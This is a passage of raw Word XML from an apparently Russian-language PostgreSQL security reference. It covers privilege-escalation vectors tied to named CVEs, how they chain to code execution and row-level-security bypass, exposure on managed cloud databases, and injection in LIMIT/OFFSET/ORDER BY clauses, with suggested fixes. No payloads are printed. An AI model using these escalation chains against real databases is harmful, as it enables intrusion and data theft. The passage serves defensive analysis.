          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            explanation="Паттерн потенциальной эскалации привилегий в "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                        "PostgreSQL. Возможна цепочка к категории 3.7 (RCE) "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                        "или 3.17 (RLS bypass).",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            suggested_fix="Уточните привилегии вызывающей роли, ownership "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                          "объектов в DDL, и наличие SET search_path в "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                          "SECURITY DEFINER функциях. См. 3.13.X для "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                          "конкретных рекомендаций.",</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break</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk 9 (не 10) потому, что эскалация — этап, не финальный урон; конкретный финал зависит от того, к какой 3.7.X-карточке ведёт chain. Поднять до 10 — при наличии корроборации с 3.7-паттернами в той же кодовой базе.</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R8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2024-10978 (SET ROLE / SET SESSION AUTHORIZATION reset-path): PostgreSQL Project Security Advisory, NIST NVD, PostgreSQL Release notes 17.1.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R12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2023-2454 (schema_element search_path bypass): PostgreSQL Project Security Advisory, cve.news разбор, PostgreSQL Release notes 15.3.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R15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2022-1552 (autovacuum SRO bypass): PostgreSQL Project Security Advisory, PostgreSQL Release notes 14.3, PostgreSQL 17 release notes (pg_maintain mitigation).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R16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2022-2625 (extension scripts ownership): PostgreSQL Project Security Advisory, EDB разбор «PostgreSQL extensions impacted by CVE-2022-2625», PostgreSQL Release notes 14.5.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R28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Trusted extensions class (R28-chain): PostgreSQL Docs CREATE EXTENSION, Severalnines «24 trusted in PG13», dbi-services, pgPedia trusted-extension. Open question 8 в research.md: точный список trusted для PG 14-17 не зафиксирован.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Общие:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PostgreSQL Docs (SECURITY DEFINER, schema search_path), PostgreSQL Wiki (search_path attacks, CVE-2018-1058 контекст), PortSwigger Web Security Academy (общая методика).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Перекрёстные ссылки на следующие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 RCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — куда эскалируют все шесть векторов 3.13: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3.13.1 → 3.7.1 (если targeted role имеет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3.13.2 / 3.13.3 / 3.13.4 / 3.13.6 → 3.7.1 / 3.7.2a / 3.7.3 (если admin =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3.13.5 chain 1 → 3.7.2b (CVE-2024-10979)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 RLS-обходы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.13.1 (CVE-2024-10978) пересекается с 3.17.3. Граница: 3.13.1 — горизонтальная эскалация ролей; 3.17.3 — обход RLS-policy через тот же баг.</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 / 3.6.4 file r/w</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часто получают через 3.13.X. Граница: 3.6 — что делать с привилегией; 3.13 — как её получить.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 Data-modifying CTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — альтернатива стакингу для DDL-инъекций.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связана с 3.13.6 общей моделью угроз (search_path hijack через неполную квалификацию).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4.2 (Хронология 2022)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2022-1552, CVE-2022-2625 — летние fixes 2022.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4.3 (Хронология 2023)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2023-2454 — майский fix 2023.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 (Хронология 2024)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2024-10978, CVE-2024-10979, CVE-2024-10976, CVE-2024-10977 — batch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общие рекомендации по management ролей: исключить GRANT-цепочки, ограничить CREATE on public/database, явный SET search_path во всех SECURITY DEFINER функциях, аудит SECURITY DEFINER в кодбазе.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5.4 Расширения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — рекомендации по trusted-extension management в production (3.13.5).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Managed-провайдеры</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Поведение для каждого вектора в managed-PostgreSQL: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Провайдер</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3.13.1 (SET ROLE)</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3.13.2 (schema_element)</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3.13.3 (autovacuum)</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3.13.4 (extension scripts)</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3.13.5 (trusted ext)</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3.13.6 (SECURITY DEFINER)</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AWS RDS</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 (тот же server-side баг, патчится в minor)</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 (autovacuum работает)</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 для RDS-extensions из </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">rds.extensions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> whitelist</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 — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">rds_superuser</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> может ставить trusted ext</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 — independent от managed</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Google Cloud SQL</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 для Cloud SQL extension whitelist</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 — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">cloudsqlsuperuser</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> ставит</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Supabase</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 — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">authenticator</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">-роль с CREATE на БД</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Azure Database for PG</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актуальна</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В отличие от 3.7 (где managed-провайдеры </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">структурно блокируют</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> RCE через отсутствие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и untrusted PLs), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.13 уязвимости актуальны на всех managed-инстансах</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> до накатывания патчей. Скорость patching у провайдеров обычно высокая (недели после release), но окно эксплуатации существует.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.13.6 (SECURITY DEFINER mis-configuration) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не закрывается обновлением</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PostgreSQL вообще, требует ревью кодовой базы заказчика. Managed-провайдер тут бессилен — это application-level mistake.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Детальный разбор managed-ограничений — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.9 Managed-провайдеры: RDS, Cloud SQL, Supabase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.14.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection в LIMIT / OFFSET / ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — класс уязвимостей, при котором пользовательский ввод попадает не в WHERE-выражение, а в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">специфичные clause-контексты</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> запроса, где привычная защита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-параметры) либо не работает вовсе, либо работает не так, как разработчик ожидает. Эти clauses имеют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">разные синтаксические контексты</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и одна и та же ошибка («передал переменную как есть») приводит к разным векторам — от классической UNION-инъекции до information-leak через порядок строк.</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не отдельный канал извлечения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — UNION/error/boolean/time-based уже покрыты в 3.1–3.4. 3.14 разбирает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">точки попадания</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в эти clauses и почему параметризация в них чаще всего ломается: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принимают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">integer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, но не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-параметр в каждом драйвере (старые версии pgjdbc, ручной SQL-builder)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&lt;column_name&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">identifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, который параметризовать нельзя по протоколу — bind-параметры подставляются только в expression-контекст, не в имя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&lt;column_number&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">integer literal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, но не expression — параметризация работает только частично</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(&lt;expression&gt;)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">arbitrary expression</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — full SQL injection surface</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mini-таблица: четыре поверхности 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Clause</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Тип контекста</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Что подставляется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Защита</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Связанный канал</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LIMIT N</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OFFSET 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integer-literal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целое число</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int()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">-cast + bind </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">:limit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 (UNION), 3.5 (stacked)</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ORDER BY col_name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identifier-token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имя колонки</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whitelist + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
